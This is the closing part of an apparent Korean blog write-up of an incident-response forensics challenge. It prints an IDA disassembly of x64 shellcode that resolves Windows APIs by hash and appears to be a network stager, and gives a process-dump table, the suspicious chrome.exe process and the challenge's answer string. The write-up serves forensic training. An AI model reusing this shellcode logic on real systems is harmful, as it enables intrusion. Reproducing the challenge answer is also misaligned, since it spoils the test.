seg000:00000000000001D2 pop rcx
seg000:00000000000001D3 mov r10d, 614D6E75h ; ws2_32.dll!closesocket
seg000:00000000000001D9 call rbp
seg000:00000000000001DB dec r14
seg000:00000000000001DE jmp loc_11F
seg000:00000000000001E3 ; ---------------------------------------------------------------------------
seg000:00000000000001E3
seg000:00000000000001E3 loc_1E3: ; CODE XREF: sub_D6+E3↑j
seg000:00000000000001E3 add rbx, rax
seg000:00000000000001E6 sub rsi, rax
seg000:00000000000001E9 test rsi, rsi
seg000:00000000000001EC jnz short loc_1A2
seg000:00000000000001EE jmp r15
seg000:00000000000001EE sub_D6 endp ; sp-analysis failed
seg000:00000000000001EE
seg000:00000000000001F1 ; ---------------------------------------------------------------------------
seg000:00000000000001F1
seg000:00000000000001F1 loc_1F1: ; CODE XREF: sub_D6+83↑p
seg000:00000000000001F1 pop rax
seg000:00000000000001F2 push 0
seg000:00000000000001F4 pop rcx
seg000:00000000000001F5 mov r10, 56A2B5F0h ; kernel32.dll!ExitProcess
seg000:00000000000001FC call rbp
seg000:00000000000001FC ; ---------------------------------------------------------------------------
seg000:00000000000001FE dw 0
seg000:0000000000000200 db 28h ; (
seg000:0000000000000201 db 42h ; B
seg000:0000000000000202 align 8
seg000:0000000000000208 dq 4240FFFFFFFFh, 3000h, 2 dup(0)
seg000:0000000000000228 db 4Eh ; N
seg000:0000000000000229 db 42h ; B
seg000:000000000000022A align 10h
seg000:0000000000000230 db 5Eh ; ^
seg000:0000000000000231 db 42h, 6 dup(0)
seg000:0000000000000238 align 20h
seg000:0000000000000240 db 4Bh ; K
seg000:0000000000000241 db 45h ; E
seg000:0000000000000242 db 52h ; R
seg000:0000000000000243 aNel32Dll db 'NEL32.dll',0
seg000:000000000000024D align 2
seg000:000000000000024E db 58h ; X
seg000:000000000000024F db 4
seg000:0000000000000250 db 56h ; V
seg000:0000000000000251 aIrtualalloc db 'irtualAlloc',0
seg000:000000000000025D align 2
seg000:000000000000025E db 5
seg000:000000000000025F ; ---------------------------------------------------------------------------
seg000:000000000000025F add [rbp+78h], eax
seg000:0000000000000262 imul esi, [rax+rdx*2+'r'], 'seco'
seg000:0000000000000262 seg000 endsUnfortunately, the investigator could not find a specific character on the shellcode. However, this shellcode has a characteristic which the network connection with the victim.
| PID | Process Name | Dump | Result |
| 6152 | notepad.exe | pid.6152.0x7ff6ce630000.dmp | Normal Application |
| 5804 |
cmd.exe | pid.5804.0x7ff7d5b00000.dmp | Normal Application |
| 4148 | smartscreen.exe | pid.4148.0x7ff7e5b40000.dmp | Normal Application |
| 2764 | chrome.exe | Error Outputting File | |
| 6140 | MpCmdRun.exe | Error Outputing File | |
| 6240 | MpCmdRun.exe | pid.6240.0x7ff6df4d0000.dmp | Normal Application |
| 1996 | chrome.exe | pid.1996.0x140000000.dmp | Suspicious |
Therefore, the investigator changed his mindset. He tried to focus only on strings plain data related to PID 1996.
Finally, He can get a message 'Frog-FWGA142FS'.
'0x0C Forensic > IR' 카테고리의 다른 글
| [Challenge] Insurance - incident-response-challenge.com (0) | 2022.03.19 |
|---|---|
| DB (0) | 2022.03.16 |
| Hello Dok (0) | 2022.03.16 |